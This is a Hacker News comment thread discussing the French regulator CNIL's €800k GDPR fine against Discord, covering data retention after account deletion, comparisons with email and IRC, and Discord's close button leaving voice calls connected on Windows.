Hacker News new | past | comments | ask | show | jobs | submit login
Discord fined €800k for failing to comply with several obligations of the GDPR (cnil.fr)
260 points by Signez 71 days ago | hide | past | favorite | 285 comments

Sorry but the points are totally valid. If you delete your account your messages are still available with a userid that if someone has it can be traced back to you. They also don't delete files or pictures you uploaded alone for this they should get fined.

I think they ended up fixing this, all the deleted users I can find resolve to UID 456226577798135808.

Although, messages that used to @mention the user don't have their UID mangled (since @mentions are really `<@userid>`), so it'd be easy to correlate someone @pinging a deleted user and that deleted user responding to the ping. Seems like fixing this would be pretty challenging (logistically and computationally) given you'd have to arbitrarily edit other peoples' messages.

Mentions are also listed in the message metadata, in the allowed_mentions field, therefore it should be very easy for Discord to strip mentions of deleted users' IDs.

In any case, 800k is a ridiculous amount for such a huge company like Discord.

Fines will go up if they don’t fix it.

They’ve probably never made any money.

"in August 2021, Discord had reported $130 million in 2020 revenues, triple from the prior year, and had an estimated valuation of $15 billion"


Revenue is not profit. You need to subtract expenses and whatnot.

That’s right. But for GDPR no one cares about profits. They need to be fined on revenue.

Otherwise non-profit making companies could do any privacy BS and not be fined.

They need to be fined based on gross annual worldwide revenue or market cap, whichever is greater.

Good point.

There's no evidence in that sentence that they have made a dime.

The company may not have recorded any profit, but the founders and other equity holders can leverage or sell that equity worth $15B.

Where do you find their revenue stream data?

isn't that the case for gmail? if you send me an email with a picture in it, then delete your email account, i can still see your email when logging into my gmail

No. Email is private messaging.

If you send email to me and then delete it in your end, I'm allowed to store your email as a whole (sometimes legally obliged).

And if I send an email to 200 recipients they can all store it, I don’t see the fundamental difference for discord TBH

>email to 200 recipients they can all store it

On discord there are no 200 individual "they" storing it. It's stored by discord. (Or I guess people could be manually logging their own chats, but that's not the issue at hand here.)

At first pass it might sound like some minor technical squabble about implementation details, but there is intentionality in design decisions. The legal system can not be blind to those.

Discord chose a design that put them in control of the data. I'm not saying the highly centralized nature of their design is bad, wrong, or wasn't the best choice for the product they want to build. What I am saying is that when the legal system looks at the nature of a product, it has to look beyond what's presented in the pretty UI and marketing materials. It will look at the business' processes too.

But that’s the same for gmail. If I send a mail to 200 gmail contacts, that mail doesn’t disappear when I delete my account

True. This is why I mentioned intentionality in design.

The design of email means there is an argument for the legal system that gmail is a very very popular post office. That email is a system wherein users have disparate storage areas for receiving/archiving emails, and gmail is one of many organizations that offers users the service of managing their individualized storage area on their behalf.

In the service that is email, there is nothing inherently special about gmail. In the service that is discord, discord is discord.

I would argue that discord and IRC, are email too. It's just the protocol of communication dictates. They all carry data to a username@somewhere; whether it a tld, username or id.

IRC enables Text & Attachments in text form (ie links)

Email Enables Attachments in visual (html emails)

Discord Enables Voice, Text and Attachments (Asynchronous sockets)

That's all it is. Present a Video, Picture, Voice to your visitor and you've got a new product. Just as facebook,twitter,myspace have been.

> I would argue that discord and IRC, are email too. It's just the protocol of communication dictates.

Assuming all this is correct, if a GMail user requests their account to be deleted, Google should delete that data.

But it does disappear when all 201 of you delete your accounts.

You can save a screenshot discord chat too. There’s nothing wrong with that. If someone published something and you want to save a copy for personal purposes, go ahead.

The difference is in what Discord’s responsibility is.

If Discord claimed to have deleted an account, then they shouldn’t still be publishing a post from a user. Especially if such a post could still be tied back to the historical user id.

I can understand why they’d want to keep the data (sometimes you need to keep an archive of posts for legal reasons - for a limited time). But making an archived post visible to the public is the problem.

An even better analogy would be a mailing list, instead of directly emailing/cc-ing recipients. Definitively not "private messaging".

If I delete my email account, and/or remove it from the list, there's no expectation that my prior emails are deleted for any of the other list subscribers.

The mailing list archive isn't pruned of my account and everything I ever sent will still be visible.

You’d have the right to request removal of your messages from the central mailing list archive (I believe), but not the copies received by the individual mailing list subscribers.

With Discord, all messages are in the “central archive”, there are no individual copies.

One difference is that you sent the email to those 200 recipients specifically, whereas in Discord you published your message to a channel whose future membership is an undetermined set of people (everyone who joins).

Taking a mailing list as an analogy: If there is a central archive of the mailing list, you can request removal of your messages from that archive, but not from the individual recipients who originally received the message.

There are two fundamental differences.

1. With email you send messages to a specific, finite list of recipients.

2. With email change of recipient list will not send them past messages whereas once you have access to discord channel you get access to history too.

It's the case for slack, insta, Facebook, Twitter, Tumblr, bereal, TikTok and snap. I am not talking about pms but public posts.

All emails and attachments are apart of your allowed cloud storage capacity, and you have to be explicit in whom you're sending emails to.

Discord is none of that. They never tell you that your messages and media are forever. If you get banned from a server or leave, all of your stuff is still there. There is no reason for this other than eventually selling that data or other evil purposes.

But it’s a chat application, those messages aren’t owned by just the user that authored them. Even if a user deletes their account I should be able to go back in my chat history and find their messages and know it was them.

It would be stupid if someone closing their cellular account would somehow reach into my phone and delete their contact, their messages, and replace their phone number with all zeros and this is semantically the same, the implementation shouldn’t matter.

If you send a message to a group chat those messages are now owned collectively by the group and individually by each member, the gpdr is forcing companies to delete my data because someone else asked to delete theirs.

I would say there's a real semantic difference between whether those files are stored and managed on your device, or on the provider's servers. If they're only on your device, have fun with them, but they are not allowed to store or touch data that I (as the sender) have instructed them to delete.

I agree with you in principle and I think that the EU is basically extorting American companies, but in your example all that information is stored in your phone, while in this case the information is stored in Discord's servers.

American companies are free to not do business within the EU. If they do, they must comply with the law. Same with USA, China, Russia, etc.

What about users from the EU who want to use those services despite the EU not liking them? Fuck them, right?

Yes but if the law was “Fuck You America Act: 5% of global revenue from US based companies goes to us because we can” then the US government might have opinions about that when it comes to trade negotiations.

The question is whether this law is closer to fuck you than it is reasonable regulation of bad behavior.

Right which to me is a distinction without a difference. If you and me are both Gmail users and you send me an email then delete your account should Gmail have to reach into my inbox and delete your emails? They’re on Google’s servers after all.

There's a spectrum of things I can share with you over gmail. Currently, if I share an email with some formatted text and attachments up to 25MB, then it's yours to keep, but anything above 25MB is shared as a link to a Google Drive upload, which remains under my account, and I can always delete or modify.

But I don't see any particular reason for where exactly the line between the two should be - why wouldn't it be that I could make anything I shared with you ephemeral, a-la Snapchat? And going back to email, it was actually MS Exchange who have supported the option to "Recall this message" [0] for many years, while gmail decided to not implement anything like that.

[0] https://support.microsoft.com/en-us/office/recall-or-replace...

Interesting; for me line seems fairly thick at "ownership" level (which just shows we may have different assumptions:)

My thoughts:

If it's in my inbox (whether on my physical phone, or hosted for me by a service provider), I own it and I get to control it regardless who sent it / how it got there (as long as other legal pre-requisites are met, i.e. not child porn etc)

If it's in my outbox, and I want to delete my account, THOSE instances of those artifacts should be removed, whether from my physical phone or by the service provider hosting them for me. If I've sent them to others, fair game, they own THOSE instances; but I expect the service provider to remove, upon my request, the artifact instances I solely own.

There is definitely a difference between PII data of different users being distributed rather randomly across personal devices vs. it being consolidated within a single company which can then proceed to use that data for all sorts of purposes you may or may not have agreed to.

It's about technical capability.

In this case, Discord is a very centralised service. They store all of the messages centrally, so can easily comply with the request.

Other services like email may not be able to do that, so they could use that as a defence when asked why they aren't deleting all data.

Does GDPR distinguish these cases? Personal information is fine to keep on an individual's computer, but not on a company computer? What about personal cloud storage like Google Drive (company's servers, individual's data)?

if they want it to work as you posit, they should not save all the date in Discords systems, but create a distributed chat system.

What’s the difference between Discord and two Gmail users communicating? The data is all on Google’s servers.

If we work on a Google Doc together should deleting your account delete my document as well? They’re both on Google’s servers and on the backend we don’t have separate copies.

Discord is a massive data store. They hoard messages. The only reason for this is to someday sell it. It doesn't matter what the CEO says, it's the investors that own it. They either have to become profitable, or sell.

Not only should they get fined. They should also fix the problem.

Yep, that's typically how this works - there's a small immediate fine for the current issues, but there'll be rapidly increasing fines in future if the issues continue beyond a reasonable timeframe to get this fixed.

They did. The CNIL did several control and verified that they indeed fixed the issues.

How does this work for IRC networks?

IRC networks don’t generally store messages and your client only receives messages that are sent while connected to the network. Users can set up their own infrastructure to store messages received by their client, though, so you never know who might be collecting logs.

So I think you could get sued for hosting logs, or you must provide a way to delete data per request.

IRC network is simply a relay. It doesn't have anything to delete begin with.

True, though the "owners" (what's the term I'm looking for here?) of some channels do public logging

e.g. https://irclogs.ubuntu.com/

You’d have the right to request removal of your messages from those logs.

I'm sure most sizable IRC networks have some level of logging if only to validate claims of spam or rule-breaking.

Even with that. It's anonymous if you don't login. All you do is pick a name you like, type something random and exit. And all they have is an ip address that may change at anytime.

I am not sure if GDPR should apply if that can't be used to trace back to you at first place.

And if this should apply. I think everyone on the earth that connect to internet are probably in danger. You visit my site and leave a message. And I am suddenly a target of GDPR, what?

Also, do GDPR actually care about internally logs? I think the requirement is the data on that platform can no longer be used to trace back to the user. But logs aren't even exposed to users.

yes GDPR care about internal data like logs, because companies get breached all the time and data get leaked.

Since GDPR, PII (Personal Identifiable Information) data has become radioactive, the less you touch it easier your life is.

I think i read somewhere that they do delete files and images after some time.

Props to the EU for keeping data giants accountable. It is a shame the data protection authorities only have resources to process so many companies, unfortunately, many get away with much more harm to user privacy.

Each country also has it's 'in house' version, that prosecute various offenders on a local/ their-national level.

In this case the fine has nothing to do with keeping data secured.

1. Failure to define and respect a data retention period appropriate to the purpose

2. Failure to comply with the obligation to provide information

3. Failure to ensure the security of personal data

4. Failure to carry out a data protection impact assessment

While not a direct security breach investigation, these have high impact on user data. (edit: formatting)

> When a user logged into a voice room closes the DISCORD application window by clicking on the "X" icon at the top right of the window in Microsoft Windows, they actually just put the application in the background and stay logged into the voice room. However, in Microsoft Windows, clicking on the "X" at the top right of the last visible application window will exit the application for the vast majority of applications.

Interesting this is considered [Microsoft] Discord's fault and not Microsoft Windows. I quit Discord with Cmd-Q, does Alt-F4 not do the right thing on Windows? The only popular program I know evil enough to override Cmd-Q is Chrome, and I blame Apple for the failing.

>Interesting this is considered [Microsoft] Discord's fault and not Microsoft Windows.

Probably because Discord implements the button, no? They configure what happens when you press "X", so their configuration is in violation, not the platform.

This whole thing is making my head ache.

Pressing X or Alt-F4 sends WM_CLOSE to the window. By default this is converted to WM_DESTROY and closes the window. By default, an application with no more windows open will exit.

It's quite normal for applications to intercept WM_CLOSE, for example with a modal dialog of "Do you want to save your files?".

Over the past few years it has also become common for applications, including Microsoft Teams, to interpret "all windows closed" as "minimise to Systray". Microsoft also responded to increasing use of the systray by auto-hiding most apps in it.

The issue is not "minimise to systray" per se, it's "sending user voice when the user thought they'd closed all the windows".

(bonus stackoverflow: you can separate the behavior https://stackoverflow.com/questions/9788662/how-do-i-repurpo... )

Discord's X button is implemented inside the webview and simply hides the window (to be revealed later by clicking the tray icon). It does not send WM_CLOSE or WM_DESTROY.

Alt+F4 is what actually closes the window, and in Discord's case, the entire rest of the app too.

>Over the past few years it has also become common for applications, including Microsoft Teams, to interpret "all windows closed" as "minimise to Systray".

More like the past few decades. Seriously, this has been a thing (usually configurable in app settings, and common in many long-running applications like messengers and music players) for as long as I can remember.

But Windows misrepresents that the application is not running, when it is running in the background with access to the mic. Is this not a poor default? The justification here is that Discord behaves differently from "the vast majority of applications". First, I'm not sure if that's true. Second, another justification brought up is that Discord doesn't show the user that their mic is still hot, Windows seems just as culpable for not "protecting by default".

For example, on my Android phone, whenever the mic/camera is in use, even if the app is in the background, the OS displays a green dot in the corner of the screen and when I poke it, it tells me what is using the mic/camera. This is a good default.

I don't think Windows is culpable instead of Discord, but I do think that more protection should be built into Windows, and based on this decision, Windows could get dinged for this as much as Discord.

I would say it shows an icon on the system tray, but I think recent versions of Windows like to hide unused icons for whatever reason.

In my experience; quite a few programs will minimize to system tray when pressing x.

The issue highlighted in the article is no other VoiP/chat program will continue to record audio in the background. Which you can absolutely do, just don't make it the default behaviour. Valid point in my view.

"The issue highlighted in the article is no other VoiP/chat program will continue to record audio in the background. "

Just tested in a call with Skype. Closing the windows still has the program running, recording, and the call is still active.

Ditto Camfrog.

Ditto Paltalk.

That's because most actual programs have a 'minimize to tray on closing' option enabled by default on install.

It's been like this since 1998 or so. I've been undoing that option for at least 20 years, because when I click X I expect it to GTFO.

> When a user logged into a voice room closes the DISCORD application window by clicking on the "X" icon at the top right of the window in Microsoft Windows, they actually just put the application in the background and stay logged into the voice room. However, in Microsoft Windows, clicking on the "X" at the top right of the last visible application window will exit the application for the vast majority of applications.

So just the same as Microsoft Teams or the vast majority of nowadays applications.

Importantly, Teams will leave a meeting if you exit the Meeting window.

Keeping the meeting going in the background is honestly pretty crazy.

I think in the Discord model it makes more sense because it's based off of how online gamers flow (basically open a voice chat and stay on there for hours on end).

It's still outside the norm on Windows I would say, even though I understand why they did it.

Gamers obviously don't talk only when they open discord. They talks in 'game' with discord minimized. It would be dumb if hide discord to background while keep chatting is a manual action by default. But that behaviour can be changed. You can ask discord to exit the app when you click x if you prefer. There is an option for it.

And about teams... who the heck want to be kept in a meeting if they are already ready to close the app?

They are just different mindset.

Its by-design, so you can voice with people while playing multiplayer games.

Minimising the window would achieve that, it's not necessary for closing it to also do so.

Closing the window frees up some video RAM, as you are no longer processing and displaying video streams from the voice/video chat. Minimizing the window keeps that RAM in active use.

Then that's also an issue that Discord should work on.

The majority of that issue IIRC lies upon the Microsoft Window Manager, and if true, not much Discord can do about that.

Sure, but if Discord is processing and displaying something, Discord can change that behaviour when it's minimised.

huh? He just explained how that's not how it works. Are you suggesting Discord to mail angry comments to windows' window manager team?

Discord is choosing to display things and can tell if you have minimised it, they don't need Windows to make any changes.

You can play multiplayer games with a window open though (as long as it doesn't try to stay in front of your game), right?

I think Teams shows a pop-up the first time its window is closed.

I'm pretty sure teams boots you out of the call too? I'm sure I've left meetings by accident that way before.

( Then again, it's not even clear what "teams" is these days given that I've somehow ended up with 2 completely incompatible copies installed on my machine. )

Teams was more nefarious than that, if you click the x it minimizes the application, if you click exit the application from menu, it keeps a background process alive, ie seperate application, that you need to also exit. I hope they get fined to hell for that since it is so annyoing

They since have seem to have fixed this, but for most of the pandemic it was like as described. Very annoying at the least.

Docker Desktop does the same. You do not want to close Docker when you close the main window, you don’t want Discord notifications to stop (or even the audio call) when you close the main chat window.

> does Alt-F4 not do the right thing on Windows

Alt-F4 closes the _window_, not the application. If the application can 'survive' without a window, not exiting the application is the correct behaviour.

Except for Discord, which actually closes the entire application on Alt-F4 instead of just the window.

Huh. You are right. Alt+F4 closes the application, clicking the X closes the window. Kinda inconsistent.

Alt+F4 closes the window, clicking the X causes the window to hide, not close.

Alt-F4 invokes different processes than the X button does. The X button is more akin to CTRL-F4.

Nah, they both send WM_CLOSE to the window. The actual problem is that Discord uses its own non-native window frame and reimplements the X button differently than they handle the actual close event.

Alt-F4 closes the window for me on Discord, not the app. There's a setting for that I suppose.

Alt+F4 kills the process.

Alt+F4 asks the window to close. If it's the main window, this will by default terminate the message loop, shutting down the application. But the application is free to handle the message whatever way it likes. Asking for confirmation, ignoring it, hiding it or closing the window without terminating the process.

Like many (most?) applications which show a notification icon, discord hides the main window when the user presses Alt+F4 or clicks on the X instead of closing it.

No it doesn't.

If I open blender and hit 'Render Image', a new Window will open with the rendered image. This does NOT spawn a new process. Hitting Alt+F4 on this window closes the window. This does NOT kill a process.

Nope, Alt+F4 is the close window shortcut.

This is even visible in the OS-controller Window Menu - hit Alt+Spacebar in any window of any app, and you'll see the Window menu appear, which will include an option for Close (the current window), showing that the shortcut for it is Alt+F4. This is even true for modal dialogs (if they are real Windows modal dialogs).

Weirdly enough, Alt+Spacebar, then clicking close only closes the window (minimizing to the tray), but just hitting Alt+F4 kills the process.

You mean for Discord I assume? That is strange indeed - though of course Windows has always allowed apps to modify any kind of behavior they want (for better and for worse).

guys i dont know why im getting downvoted - on my windows 10 machine, newest discord version -> alt+f4 kills the process and x-ing the app does not.

>I quit Discord with Cmd-Q, does Alt-F4 not do the right thing on Windows?

I think the expectation of Windows users is that the X does in fact quit the application, so they don't reach for Alt-F4 the same way Mac users reach for Cmd-Q when they want to quit an application.

Basing this on the common complaint of "Why does the application still stay in the Dock after I close it?" from Windows to Mac switchers.

Plenty of Windows applications continue running in background by default after pressing X. It's so widespread that I'd say it's the expected behavior for anything that has a tray icon (Discord does). Most apps that are designed to run in background behave like that by default - media players, torrent clients, sync and backup programs, communication apps, even VMs.

For applications with an open mic to disappear into the Tray Icon without any visual indicator in the UI that the mic is still open however is very uncommon.

Judging by the amount of garbage I usually see in the tray for "regular" Windows users, I'm not sure if they actually understand it.

It's hard to blame apple or blame microsoft for simply having a different convention, which they've long had, I remember struggling to use an iMac back in the day because nothing ever quit when I wanted it to, but I accept that their model is different.

In Windows it's convention for the top right X to be "Quit Application" and equivalent to alt+f4.

It can be useful to have X close to system tray, in which case they can be configured to act that way on an opt-in basis.

I'd still expect an active call to close however, unless a very specific single-purpose thing like mumble. (Which still has "close to tray" opt-in iirc ).

The wider frustrating point is the erosion of the desktop as a whole and the abandonment of native desktop toolkits means it's a total crap-shoot now how something will behave by default, not just on this issue but a whole range of them.

The convention on Windows has always been that Alt+F4 or the X button (or the Close action in the Window Menu) will close the currently focused window (this even works for dialog boxes in Win32 apps!). There is also a softer convention that apps exit when their main/last window is closed, but this has never been a strong convention, and Chat apps in particular have been exiting/minimizing to systray when their windows are closed for decades at this point.

However, keeping an active voice session open with no window open is definitely outside the norm - most apps with audio chat that I know have to audio chat strictly tied to a window.

> In Windows it's convention for the top right X to be "Quit Application" and equivalent to alt+f4.

Depends on the app. Some apps, specifically communication, have a convention of: "_" minimizes to taskbar, "X" minimizes to tray. The latter is used constantly because I don't want Discord sitting in my taskbar half the day, but I want to stay online (and sometimes in a voice chat with friends).

On that note, I find this point completely ridiculous given that: (A) Discord notifies you the first time you "X" it that it minimized, and (B) IM apps dating back to MSN Messenger in 2003 would do this.

AFAIK ALT+F4 is the equivalent of clicking the close window button on Windows, or on macOS. It does not necessarily quit the application.

Teams and Spotify, for example, by default don't quit. Many others have a "keep application running when window is closed".

And users hate it.

Doesn't Skype have the same behaviour? Clicking "X" doesn't close the application.

Chat apps had that behavior since decades ago, ever since Windows95 got a systray. It's nothing new or special, it's kind of expected at this point.

Though I think here is a failure of Microsoft to improve the UI and use different symbols for closing the app and suspending it into the systray.

Either way, seems like a rather strict interpretation of 25.2. That said, I kind of welcome it. The principle of least surprise is something that should be much more strictly enforced and a lot of social apps make it way to easy to accidentally leak data into the public.

I would say close the window of chat app kill the ongoing chat session more surprising than not. The worst you should do is a prompt with yes/no and a checkbox to remember my decision when you do it the first time.

Even AOL instant messenger did this. It would exit the window but still leave the application running with an icon in the systray area adjacent the clock.

Skype is the reason this behavior was popularized in VoIP apps. TeamSpeak and Mumble have a setting that allows this too, because people got used to Skype not shutting down after clicking "X".

Wasn't it msn messanger ?

Yes and Slack does the same.

I like the CMD+Q Chrome implementation on macOS and would like to see it everywhere, essentially acts as a confirmation since it will quit if you press again or your do a long press.

See, Apple put @ on Q on some languages[0] and you are required to press OPTION+Q to type @ and quite often you end up closing the app when you are trying to type an e-mail address. It's particularly annoying in browsers when you accidentally close the browser when you are about to complete a long form. I've overwritten the CMD-Q for Safari due to this particular reason.

[0] https://i.imgur.com/bx6XsIh.png

The @ on Q is a keyboard layout standard adopted my some languages. At least it's not Apple's design decision.

I'm Icelandic and a programmer. I work with US Ansi layout keyboards. Working with Icelandic ISO layout is horrible when programming. All the "programming" keys are strewn all over the keyboard and hidden under the option layer. I think they did this to make space for the special letters in the Icelandic language. On the other hand in the US Ansi layout the "programming" keys are close to the home row.

Couple of examples, but you can find more if you want to: {} is easily accessible on the US Ansi, but Icelandic ISO it's under option+7 and option+0. ; is right under your pinky on the home row on the US Ansi, but shift+, on the Icelandic ISO layout.

The @ is also on Q on the Icelandic keyboards. Which is absolutely insane, because quitting applications in macOS you do cmd+Q and on windows I think it is ctrl+Q. On windows you have to do alt-gr+Q to get the @ symbol. But on macOS you can do both option+Q or option+2. I use the option+2. I'm not pressing that Q with a modifier combo, unless I intend on quitting something.

It's not Apple's fault. @ being on Q is the German national norm [1].

The problem is people who are accustomed to Windows keyboard layouts (which matches the national norm) - they are accustomed to Alt Gr+Q for @, and the Alt Gr key is on Windows the key right next to the space bar... which means they press Cmd+Q on Macs instead out of muscle memory.

You can put in a Windows keyboard layout that restores your sanity on macOS [1] with only the small re-learning of using right Option instead of cmd, the problem is stuff like Adobe Premiere outright refuses to load keyboard shortcuts if it doesn't recognize the keyboard layout.

[0] https://de.wikipedia.org/wiki/DIN_2137

[1] https://jankarres.de/2013/07/windows-tastaturlayout-unter-ma...

That is a regretable choice on Apple's part. First, on the US layout as least, there's a series of standard overrides dating back decades. OPT+Q is the rarely used œ (@ is SHIFT+2 on most US layouts), but some are helpful like ® (R), π (P), etc... Second, some apps bind OPT+KEY to commands!

Nope. It's a country/language choice. Not an Apple choice.

"clicking on the "X" at the top right of the last visible application window will exit the application for the vast majority of applications."

It used to be like you describe, but this is a disappearing rule. An increasing amount of companies build apps designed in a way that you need to have sysadmin skills to actually terminate the program for real.

We can't expect Microsoft to require developers to implement this 'X' correctly because Microsoft itself is exploiting this loophole by keeping some of its apps alive when the user clicks the 'x' button.

This is a common trend I already mentioned here several years ago initiated by GAFAM companies to subversively rewrite the signification of common concepts that they disagree with: - "no/decline" -> maybe later - "no/decline" -> skip for now - "no/decline" -> remind me later - "close" -> sleep" / run into background - "delete data" -> hide/hide temporarily - "delete account" -> deactivate (but keep everything) - "somebody" -> best friend - "buy/pay" -> rent - "configure" -> submit your preferences, we will take that into account etc.

All these concepts are being actively stolen from the population and I am terribly saddened to see the vast majority of our regulators have absolutely no clue about the long-term consequences of this concepts being stolen/rewritten without tacit consent.

So, yes, Discord rewrote the 'x' button but to be honest: who cares? Apparently only too few.

Why do apps think it is necessary to start playing with the UI when we have a minimise button? When I click "X" I expect the application to exit as it did in Windows 1.0 and the minimise button to either put it in the startbar or the status bar but keep running.

EDIT: I remembered incorrectly, Windows 1.0 did not have a X button but a close button on the right side of the window.

Apps minimizing to systray when their main window is closed have existed since at least Windows 95/98. Yahoo! Messenger and probably AOL did the same thing 25 years ago.

Minimising to the stray isn't so much the problem as remaining connected to the voice chat. Skype in this circumstance doesn't fully minimise but still has a little foreground window making it obvious that you're still on the call.

Yes, that much I agree with - having an ongoing voice call with no active window is definitely not normal behavior. Even playing audio with no visible window is strange, but recording is even stranger.

Minimize keeps cluttering up the taskbar. That's why all persistent-background apps go into the systray, be it chat apps, mouse drivers, graphics driver or whatever. You don't want them to fill up your taskbar for no reason. This has been common practice since the Windows95 days.

Windows could handle this a bit better (e.g. different symbol than "X"), but there is nothing wrong with the behavior itself. A clear icon to indicate that the mic is in use wouldn't hurt either.

This is a case of lackluster UI that everybody got used to over the years and never fixed, not some kind of evil dark pattern thing.

I think people are just arguing that this is a terrible practice. Instead of having a clogged up taskbar, you have a clogged up tray. In hindsight, Microsoft should have somehow added a better UI affordance back in the 90s, to disincentives this abuse.

Mac has its own share of applications going against the OS convention. There are quite a few third party Mac applications that annoyingly force the process to exit when the user closes the main window. There are Mac apps that are also starting to intercept ⌘Q and not exiting the process or, infuriatingly, making you hold the key down in order to actually exit (I'm looking at you, Chrome).

I wish product designers would please just stop thinking their app is uniquely special, second guessing OS conventions.

> When I click "X" I expect the application to exit as it did in Windows 1.0

X didn't appear until Windows 95.

In Windows 1.0 there was no X button.

On macOS, you can already close all windows without exiting an application, so Discord does not violate any established convention. (Clicking the red traffic-light close button does not usually close the entire app; Cmd+Q does.)

On Windows, there is no concept of applications at all, only windows. Perhaps you can try to mess with processes, but there's not even any mechanism for activation of a process that would even allow it to begin to work in any way similar to macOS's model.

So yes. Closing all windows, on Windows, is widely assumed to terminate the associated process. This is why apps like Thunderbird, for example, close entirely when you click the X, and only actually go to the system tray when you click minimize.

Interestingly, with Discord on Windows, Alt+F4 completely closes the entire app. The close button is implemented by the webpage, however, and closes to the system tray instead of actually closing the window.

> The only popular program I know evil enough to override Cmd-Q is Chrome, and I blame Apple for the failing.

TBF I've been saved a few times from losing all my browser state by accidentally hitting cmd-Q.

> does Alt-F4 not do the right thing on Windows

It usually closes the active window, but Discord does close the entire application for some reason.

Yes, Alt+F4 does close the application (no more process). Clicking on the X closes the window and moves the icon to the system tray, effectively hiding the icon and making the icon on the task bar disappear (or if pinned seem like the application isn't running).

Anecdotally, I rarely use alt+f4 to close a window.

Not sure about Discord, but for Teams and Slack, there is no difference between clicking the X button, hitting Alt+F4, or accessing the Window menu (hard to do) and selecting Close from there; which is not surprising, as Alt+F4 is the shortcut for the Close action, which is the equivalent of the X button by convention.

Discord does close the entire application on Alt-F4 instead of just the window, it's quite weird.

> Alt+F4 does close the application (no more process)

Alt+F4 never closed the application. Alt+F4 closes the window. That said, _some_ applications do close when their primary window is closed.

Somehow I missed the part of the "very easy to understand and straightforward GDPR" that prohibits this. I've been saying all along that this regulation is dangerously boundless, but I can't wait for someone to justify to me why this actually makes total sense.

> does Alt-F4 not do the right thing on Windows?

Alt+F4 does close the application, "X-ing" it however puts it into the system tray and it remains active, which bothered me from the first day i've been using it.

Not sure about Discord, but this would be extremely weird behavior. The extremely clear convention on Windows is that Alt+F4 closes the currently focused window, not more, no less.

Whether closing the current window should close the application or not depends on many things, but having different behavior between Alt+F4 and the window close button would be very strange.

Seems insane, many apps keeps running with an icon visible in the notification area when exited like that. Discords icon also shows if you are in a voice channel.

It's not just that the application keeps running, but the active voice call you're in stays connected and everyone can still hear you. That is definitely counterintuitive, I would at least expect a popup saying "did you mean to close the call, this is just minimizing it to the background" or something.

Also, that's 1 of 5 issues.

It's not counterintuitive to anyone who has used a VoIP application in the past ten years.

Well one of Discord's main demographics (which they intentionally target) is kids, who often haven't used any other VoIP application outside of a phone.

Discord did not get this fine for this one point, but for the sum of all issues.

Yeah, but the fact that they got money from them for this "issue" is laughable.

They "didn't get money from them", the EU is not some sort of criminal operation.

They fined them based on violations reported by users and Discord can contest this in a court of law.

No, they got money from them for the other issues probably.

Something worth noting that a lot of comments are ignoring here: while this fine is coming from the EU, these kinds of data protection rules are _everywhere_ now - this is no longer really EU-specific.

The reality is that it's not an US companies vs EU data protection law battle - it's US companies vs data protection laws in the comfortable majority of all other developed nations. The EU, UK, Switzerland, Canada, Brazil, Israel, South Korea, Argentina, Japan, New Zealand, Indonesia, Uraguay, etc, all have substantial data protection legislation. The EU has an published list of countries whose data protection laws are considered equivalent to GDPR: https://ec.europa.eu/info/law/law-topic/data-protection/inte...

While it's the EU fining Discord in this case, presumably the equivalent laws in each of those countries would also come to similar conclusions everywhere else too (though so far it seems the EU has more political appetite and clout to press the issue).

There's no world where Discord or other major US companies can pull out of the EU and keep following these practices, even if that was worthwhile. To avoid having to implement data protection practices, they'd have to drop the vast majority of all international users (and in Discord's case, https://www.similarweb.com/website/discordapp.com/#traffic suggests the US is currently <30% of their user base, so that's just not happening).

Have those other laws been enforced against Discord? Also, pulling out of one zone because they enforced (what you believe to be an onerous) a law against you is always valid, it'll make the others think hard about enforcing the law against you.

> it'll make the others think hard about enforcing the law against you.

We are not talking about some high-security military stuff here, it's only a chat app.

It might be a big part of your world, but I can guarantee you that if they try to pull that off nobody in any government would care.

I am pretty sure of the contrary actually: that several governments in EU have dreams of getting rid of these platform, and that they can't do it because that would be illegal.

If every chat app makes the same determination and disables itself in the EU no one will care? I doubt that.

Vpn's exist. I fairly frequently come up against us websites that tell 'content not available in your area due to gdpr'. Thankfully the vpn i use is three clicks and I'm in America.

Not many people use VPNs.

Just because I haven't logged in in two years doesn't mean I want my account deleted... And they get fined for putting the app in the tray when user click the X button? And because they accept 6 character passwords? Those regulations are insane.

It seems like they didn't even consider any of the real issues. Things like deleted messages appearing in requests for your data, leaving a chat (or deleting your account while you are in a chat) with a deleted user not deleting the messages and uploads even though nobody is supposed to be able to re-join it, people getting banned for using scripts to mass-delete their own posts and in some cases getting banned for manually deleting their own posts "too fast", "right to be forgotten" requests being ignored, etc.

I wonder how this is supposed to work with workplace apps such as Slack.

Assume I am leaving my job and want my personal information removed from this third-party service (Slack). They say [1] "Primary Owners of a workspace or org must contact Slack to request deletion of a deactivated member's profile information.". What if I contact the "Primary Owner" before leaving my job and they ignore my request, or if I've already left and don't know how to contact them or who they are? Why can't I simply request that my personal information be removed from a completely third-party American company's database?

I thought about this out loud before, and got the response "If you are using company account, company owns the data. The data produced during company time is company's property. Company has to request for deletion. Slack is right about it."

That made makes me ask more questions:

- Is my full name, birth date, telephone number, job and other details Slack collects company property?

- Can they also sell this to other third parties, along with my social security number, which the company also collected during business hours?

- Is Slack also free to sell this data to third parties?

- Does GDPR protect your personal information ONLY if you gave it away during your free / unemployed time using your personally owned devices and ONLY to services you have admin access to?

[1] https://slack.com/help/articles/360000360443-Delete-profile-...

You could ask the local DPA to look at your former employer(and then sue them if they decide to ignore you). Companies have been fined for lax handling of employee data.

Slack is likely trying to operate under one of the attempts to replace the invalidated "privacy shield" framework(the current attempt is summarized here https://www.tadpf.eu/) for their European enterprise customers, and a part of this is having contracts prohibiting slack from handing out the data to any 3rd party, but your relationship here is with your former employer and not slack.

the Schrems rulings is a bit of a problem for slack here but that's not because slack is necessarily violating the GDPR directly but because the US does not live up to EU's standards for what a modern democracy is allowed to subject people to to in terms of protection against "unreasonable search and seizure"(this term actually comes form the Fourth Amendment of the us constitution but somehow the US courts don't think it applies to foreign persons or digital records held by cloud companies).

> When a user logged into a voice room closes the DISCORD application window by clicking on the "X" icon at the top right of the window in Microsoft Windows, they actually just put the application in the background and stay logged into the voice room.

> DISCORD's behavior is different and may lead to users being heard by other members in the voice room when they thought they had left.

Yeah, that's bad

I'm not such a big fan of password policies but 6 characters with no rate-limiting seems bad as well

I'm not fond of regulatory agencies defining what constitutes an acceptable password policy.

Also, regulatory agencies mandating UI designs - while in this case fairly innocuous - leaves a bad taste in my mouth.

How is this UI design? Wouldn't this fall under UX or just basic functionality? I press X, program close. If I want it minimized I press the minimize button.

How discord works is the expected behaviour for many users, including myself. I do not want to minimize the window (keeping it in the task bar), I want to close the window, while keeping the background worker running.

My experience with applications that show a notification/tray icon is that about 80% of them do not shut down when closing the main window. And the ones that don't follow this pattern by default can usually be configured to work this way.

